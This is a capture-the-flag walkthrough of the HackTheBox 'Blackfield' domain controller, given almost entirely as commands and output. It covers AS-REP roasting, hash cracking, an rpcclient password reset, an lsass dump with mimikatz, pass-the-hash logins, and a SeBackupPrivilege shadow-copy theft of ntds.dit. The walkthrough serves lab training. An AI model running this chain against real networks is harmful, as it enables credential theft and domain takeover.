NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 19:13 IST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 19:13 Completed NSE at 19:13, 0.00s elapsed Initiating NSE at 19:13 Completed NSE at 19:13, 0.00s elapsed Initiating NSE at 19:13 Completed NSE at 19:13, 0.00s elapsed Initiating Ping Scan at 19:13 Scanning 10.10.10.192 [4 ports] Completed Ping Scan at 19:13, 0.60s elapsed (1 total hosts) Initiating SYN Stealth Scan at 19:13 Scanning blackfield.htb (10.10.10.192) [1000 ports] Discovered open port 445/tcp on 10.10.10.192 Discovered open port 53/tcp on 10.10.10.192 Discovered open port 139/tcp on 10.10.10.192 Discovered open port 135/tcp on 10.10.10.192 Discovered open port 88/tcp on 10.10.10.192 Discovered open port 593/tcp on 10.10.10.192 Discovered open port 3268/tcp on 10.10.10.192 Discovered open port 389/tcp on 10.10.10.192 Completed SYN Stealth Scan at 19:13, 24.70s elapsed (1000 total ports) Initiating Service scan at 19:13 Scanning 8 services on blackfield.htb (10.10.10.192) Completed Service scan at 19:16, 156.27s elapsed (8 services on 1 host) Initiating OS detection (try #1) against blackfield.htb (10.10.10.192) Retrying OS detection (try #2) against blackfield.htb (10.10.10.192) Initiating Traceroute at 19:16 Completed Traceroute at 19:16, 0.73s elapsed Initiating Parallel DNS resolution of 2 hosts. at 19:16 Completed Parallel DNS resolution of 2 hosts. at 19:16, 0.60s elapsed NSE: Script scanning 10.10.10.192. Initiating NSE at 19:16 Completed NSE at 19:17, 40.10s elapsed Initiating NSE at 19:17 Completed NSE at 19:17, 3.22s elapsed Initiating NSE at 19:17 Completed NSE at 19:17, 0.00s elapsed Nmap scan report for blackfield.htb (10.10.10.192) Host is up (0.51s latency). Not shown: 992 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-10 20:49:11Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=7/10%Time=5F0870AA%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: Incremental Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h05m04s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-07-10T20:51:52 |_ start_date: N/A TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 721.31 ms 10.10.14.1 2 721.43 ms blackfield.htb (10.10.10.192) NSE: Script Post-scanning. Initiating NSE at 19:17 Completed NSE at 19:17, 0.00s elapsed Initiating NSE at 19:17 Completed NSE at 19:17, 0.00s elapsed Initiating NSE at 19:17 Completed NSE at 19:17, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 235.29 seconds Raw packets sent: 2093 (95.776KB) | Rcvd: 111 (7.997KB)
PORT ENUMERATION
PORT 445
┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield] └──╼ #smbclient -L 10.10.10.192 Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share forensic Disk Forensic / Audit share. IPC$ IPC Remote IPC NETLOGON Disk Logon server share profiles$ Disk SYSVOL Disk Logon server share z Disk SMB1 disabled -- no workgroup available
Further we will check PROFILES
┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield] └──╼ #smbclient \\\\10.10.10.192\\profiles$ Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Jun 3 22:17:12 2020 .. D 0 Wed Jun 3 22:17:12 2020 AAlleni D 0 Wed Jun 3 22:17:11 2020 ABarteski D 0 Wed Jun 3 22:17:11 2020 ABekesz D 0 Wed Jun 3 22:17:11 2020 ABenzies D 0 Wed Jun 3 22:17:11 2020 ABiemiller D 0 Wed Jun 3 22:17:11 2020 AChampken D 0 Wed Jun 3 22:17:11 2020 <---->
Here we have Names So I just created a Users list and we know that for kerberos enumeartion we need users for it. So I just ran this list against that Kerb Script GetNPUsers.py
┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield] └──╼ #python GetNPUsers.py blackfield.local/ -usersfile user.txt -dc-ip 10.10.10.192 -no-pass Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation <----> [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) $krb5asrep$23$support@BLACKFIELD.LOCAL:f740efb0de3b25d7772ffa79327a9774$bf66496d2586b4c4e88d093f23ced3da37775a3ac7383f264b94b15615bb2cc4d4135afb6d09846829caac8a5a248193ad2cea818f68b44f62af6ff3e959fd9c33565a61ed7a9da1d03e2ca3f62a0550d884b278c37979425b44d85109caaac4383b7677d08b560013ff2f530cebbffb0adc43c27ad2a0e7d1f826eddd13f7035413514c8047e6994970bbcb97928caa116148dc8ed918bdd60c06ded06ea66af321fe369239bffe5e6d6419e4f44b98c9bec1af1c24bad8a997fecaad188a53a09030ad71b53bb5e15b3555d90e071ae7116357c33be0ccce0aebe459f5435f708fa75792881ce6ac3a7f734ee457e3283fcf60 [-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) <---->
After cracking this hash using HASHCAT
┌─[root@liquid]─[~/Desktop/HTB/blackfield] └──╼ #hashcat -m 18200 -a 0 kerbhash ../../THM/Wordlists/rockyou.txt --force --show $krb5asrep$23$support@BLACKFIELD.LOCAL:fad1ab0da848d218949d3da5661c74ad$8a5cd1423dab835c437cd8109d3339f511843122c04a914ada392308d3610605603d48350a03e18c5763cd61fecb0ffb4e48eaf3bcd45e059fe3f92071f3cd0549a3c29c2a0c2ea5b4e6f30ed63ab4005029e9496d7b8f376bea3bd65f3086d1e9b36674ed16c33feca721d40f64db3bd0c8cdd46df79849ffef9c481cddd78bd6b9d027b3ad5a68b6f00190d9c3ebe0e63913a087b48991baaded76086368a483c3b4f1658d9fb336648f145780c2f4535707ed6110ee5ff9623330c25680aa17c20dd885d6a4a88d93f98dcc8359fb32a876dc9263be6facc8cb3e44ec1d681e94df3c18b6febfb94ff19a7c8a7a3a0b891b8a:#00^BlackKnight
I tried this password against EVIL_WINRM , SMBCLIENT , RPCCLIENT It worked againat SMB and RPC . I got Usefull information in RPCCLIENT .
┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield] └──╼ #rpcclient -U support 10.10.10.192 Enter WORKGROUP\support's password: rpcclient $> rpcclient: missing argument rpcclient $> dir command not found: dir rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[audit2020] rid:[0x44f] user:[support] rid:[0x450] user:[BLACKFIELD764430] rid:[0x451] user:[BLACKFIELD538365] rid:[0x452] user:[BLACKFIELD189208] rid:[0x453] user:[BLACKFIELD404458] rid:[0x454] user:[BLACKFIELD706381] rid:[0x455] user:[BLACKFIELD937395] rid:[0x456] user:[BLACKFIELD553715] rid:[0x457] <--->
Here I just enumerated Privileges:
┌─[root@liquid]─[~/Desktop/HTB/blackfield] └──╼ #rpcclient -U support 10.10.10.192 Enter WORKGROUP\support's password: rpcclient $> rpcclient: missing argument rpcclient $> enumprivs found 35 privileges SeCreateTokenPrivilege 0:2 (0x0:0x2) SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3) SeLockMemoryPrivilege 0:4 (0x0:0x4) SeIncreaseQuotaPrivilege 0:5 (0x0:0x5) SeMachineAccountPrivilege 0:6 (0x0:0x6) SeTcbPrivilege 0:7 (0x0:0x7) SeSecurityPrivilege 0:8 (0x0:0x8) SeTakeOwnershipPrivilege 0:9 (0x0:0x9) SeLoadDriverPrivilege 0:10 (0x0:0xa) SeSystemProfilePrivilege 0:11 (0x0:0xb <---->
So From above Privs and help from my friend I came to know that I can change password for user in AD. Which looks like this
https://malicious.link/post/2017/reset-ad-user-password-with-linux/
┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield] └──╼ #rpcclient -U support 10.10.10.192 Enter WORKGROUP\support's password: rpcclient $> setuserinfo2 audit2020 23 'liquid12@@#' rpcclient $>
Here you need to set password which is complex otherwise you may get error!!.So lets get back to smbclient To access other shares!!.Share which i Got usefull which had some data and accessed by User audit2020 is forensic .Their is folder which has lsass zip which stores Hashes So Lets Get that ZIP out.
<!-- wp:syntaxhighlighter/code --> <pre class="wp-block-syntaxhighlighter-code">┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield] └──╼ #smbclient -U audit2020 \\\\10.10.10.192\\forensic Enter WORKGROUP\audit2020's password: Try "help" to get a list of possible commands. smb: \> cd memory_analysis\ smb: \memory_analysis\> dir . D 0 Fri May 29 01:58:33 2020 .. D 0 Fri May 29 01:58:33 2020 conhost.zip A 37876530 Fri May 29 01:55:36 2020 ctfmon.zip A 24962333 Fri May 29 01:55:45 2020 dfsrs.zip A 23993305 Fri May 29 01:55:54 2020 dllhost.zip A 18366396 Fri May 29 01:56:04 2020 ismserv.zip A 8810157 Fri May 29 01:56:13 2020 lsass.zip A 41936098 Fri May 29 01:55:08 2020 mmc.zip A 64288607 Fri May 29 01:55:25 2020 RuntimeBroker.zip A 13332174 Fri May 29 01:56:24 2020 ServerManager.zip A 131983313 Fri May 29 01:56:49 2020 sihost.zip A 33141744 Fri May 29 01:57:00 2020 smartscreen.zip A 33756344 Fri May 29 01:57:11 2020 svchost.zip A 14408833 Fri May 29 01:57:19 2020 taskhostw.zip A 34631412 Fri May 29 01:57:30 2020 winlogon.zip A 14255089 Fri May 29 01:57:38 2020 wlms.zip A 4067425 Fri May 29 01:57:44 2020 WmiPrvSE.zip A 18303252 Fri May 29 01:57:53 2020 7846143 blocks of size 4096. 3931591 blocks available smb: \memory_analysis\> </pre> <!-- /wp:syntaxhighlighter/code -->
First Download zip file and after extratcing you will get lsass.DMP.
Just open UP mimikatz and use this command :
After that run this
sekurlsa::logonPasswords
You will get your HASH for user SVC_BACKUP
GETTING USER ACCESS
┌─[root@liquid]─[~/Desktop/HTB/blackfield] └──╼ #evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls Directory: C:\Users\svc_backup\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 7/10/2020 10:01 AM tmp -ar--- 7/10/2020 5:04 AM 34 user.txt
So Lets search for Privilege escalation
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all USER INFORMATION ---------------- User Name SID ===================== ============================================== blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled.
GETTING ROOT ACCESS
In Brief what we are going to do is that we will just create a copy of C directory into new one then we will get files from their as we are solving AD room so we will get AD password stored file NDTS from where we will get hash and also we need system.hive file to get our secretsdump script from impackets could work and we will get hash !!
SCRIPT WHICH WILL CREATE NEW DIRECTORY COPY OF C DIRECTORY :
set context persistent nowriters#
add volume C: alias test#
create#
expose %test% g:#
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cd ../../../ *Evil-WinRM* PS C:\> mkdir temp cd temp upload di Directory: C:\ s Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 7/10/2020 4:07 PM temp *Evil-WinRM* PS C:\> cd temp *Evil-WinRM* PS C:\temp> upload diskexploit.txt Info: Uploading diskexploit.txt to C:\temp\diskexploit.txt Data: 112 bytes of 112 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\temp> ls Directory: C:\temp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/10/2020 4:08 PM 86 diskexploit.txt *Evil-WinRM* PS C:\temp> diskshadow /s diskexploit.txt Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: DC01, 7/10/2020 4:09:11 PM -> set context persistent nowriters -> add volume C: alias new1 -> create Alias new1 for shadow ID {6067a30e-a018-4980-b41f-7c734e81b825} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {534f88ab-b505-4e7f-ab7e-5c545f423da1} set as environment variable. Querying all shadow copies with the shadow copy set ID {534f88ab-b505-4e7f-ab7e-5c545f423da1} * Shadow copy ID = {6067a30e-a018-4980-b41f-7c734e81b825} %new1% - Shadow copy set: {534f88ab-b505-4e7f-ab7e-5c545f423da1} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\] - Creation time: 7/10/2020 4:09:12 PM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3 - Originating machine: DC01.BLACKFIELD.local - Service machine: DC01.BLACKFIELD.local - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent No_Writers Differential Number of shadow copies listed: 1 -> expose %new1% g: -> %new1% = {6067a30e-a018-4980-b41f-7c734e81b825} The shadow copy was successfully exposed as g:\. -> *Evil-WinRM* PS C:\temp> g: *Evil-WinRM* PS G:\> ls Directory: G:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/26/2020 5:38 PM PerfLogs d----- 6/3/2020 9:47 AM profiles d-r--- 3/19/2020 11:08 AM Program Files d----- 2/1/2020 11:05 AM Program Files (x86) d----- 7/10/2020 4:08 PM temp d-r--- 2/23/2020 9:16 AM Users d----- 5/28/2020 9:34 AM Windows cd Window*Evil-WinRM* PS G:\> cd Windows ls *Evil-WinRM* PS G:\Windows> ls Directory: G:\Windows Mode LastWriteTime Length Name ---- ------------- ------ ---- <----> d----- 9/15/2018 12:19 AM diagnostics d----- 9/15/2018 2:08 AM DigitalLocker d---s- 9/15/2018 12:19 AM Downloaded Program Files d----- 9/15/2018 12:19 AM drivers d----- 9/15/2018 2:08 AM en-US d-r-s- 9/6/2019 5:31 PM Fonts d----- 9/15/2018 12:19 AM Globalization d----- 9/15/2018 2:08 AM Help d----- 9/15/2018 12:19 AM IdentityCRL d----- 9/15/2018 2:08 AM IME d-r--- 2/28/2020 4:26 PM ImmersiveControlPanel d----- 7/10/2020 9:41 AM INF d----- 9/15/2018 12:19 AM InputMethod d----- 9/15/2018 12:19 AM L2Schemas d----- 9/15/2018 12:19 AM LiveKernelReports d----- 5/26/2020 5:36 PM Logs d-r-s- 9/15/2018 12:19 AM media d-r--- 7/10/2020 4:58 AM Microsoft.NET d----- 9/15/2018 12:19 AM Migration d----- 9/15/2018 12:19 AM ModemLogs d----- 7/10/2020 4:47 AM NTDS d----- 9/15/2018 2:09 AM OCR d-r--- 9/15/2018 12:19 AM Offline Web Pages d----- 2/1/2020 7:55 PM Panther <----> *Evil-WinRM* PS G:\Windows> cd NTDS *Evil-WinRM* PS G:\Windows\NTDS> ls Directory: G:\Windows\NTDS Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/6/2020 8:35 AM 8192 edb.chk -a---- 7/10/2020 4:02 PM 10485760 edb.log -a---- 2/23/2020 9:41 AM 10485760 edb00003.log -a---- 2/23/2020 9:41 AM 10485760 edb00004.log -a---- 2/23/2020 9:41 AM 10485760 edb00005.log -a---- 2/23/2020 3:13 AM 10485760 edbres00001.jrs -a---- 2/23/2020 3:13 AM 10485760 edbres00002.jrs -a---- 2/23/2020 9:42 AM 10485760 edbtmp.log -a---- 7/10/2020 4:47 AM 18874368 ntds.dit -a---- 7/10/2020 11:18 AM 16384 ntds.jfm -a---- 7/10/2020 4:47 AM 434176 temp.edb *Evil-WinRM* PS G:\Windows\NTDS> c: *Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeUtils.dll Info: Uploading SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll Data: 21844 bytes of 21844 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeCmdLets.dll Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll Data: 16384 bytes of 16384 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeCmdLets.dll *Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeUtils.dll *Evil-WinRM* PS C:\temp> Copy-FileSebackupPrivilege g:\Windows\NTDS\ntds.dit C:\temp\ndts.dit *Evil-WinRM* PS C:\temp> ls Directory: C:\temp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/10/2020 4:09 PM 610 2020-07-10_16-09-12_DC01.cab -a---- 7/10/2020 4:08 PM 86 disk_shadow.txt -a---- 7/10/2020 4:50 PM 18874368 ndts.dit -a---- 7/10/2020 4:10 PM 45056 sam.hive -a---- 7/10/2020 4:49 PM 12288 SeBackupPrivilegeCmdLets.dll -a---- 7/10/2020 4:48 PM 16384 SeBackupPrivilegeUtils.dll -a---- 7/10/2020 4:10 PM 17346560 system.hive *Evil-WinRM* PS G:\Windows\NTDS> reg save HKLM\SYSTEM c:\temp\system.hive The operation completed successfully. *Evil-WinRM* PS G:\Windows\NTDS> Reg save HKLM\SAM c:\temp\sam.hive The operation completed successfully. *Evil-WinRM* PS G:\Windows\NTDS> c: *Evil-WinRM* PS C:\temp> ls Directory: C:\temp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/10/2020 4:09 PM 610 2020-07-10_16-09-12_DC01.cab -a---- 7/10/2020 4:08 PM 86 diskexploit.txt -a---- 7/10/2020 4:10 PM 45056 sam.hive -a---- 7/10/2020 4:10 PM 17346560 system.hive
Here we will just download every file on our PC anmd run this command!!
┌─[root@liquid]─[~/Desktop/HTB/blackfield] └──╼ #python secretsdump.py -ntds ntds.dit -system system.hive local Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
You Will get hash for administrator :
184fb5e5178480be64824d4cd53b99ee : administrator
┌─[root@liquid]─[~/Desktop/HTB/blackfield] └──╼ #evil-winrm -u administrator -H 184fb5e5178480be64824d4cd53b99ee -i 10.10.10.192 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami blackfield\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt c4809e0a73899ca82249b1b973c8527e *Evil-WinRM* PS C:\Users\Administrator\Desktop>
So This machine was all about ENUMERATION !!
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE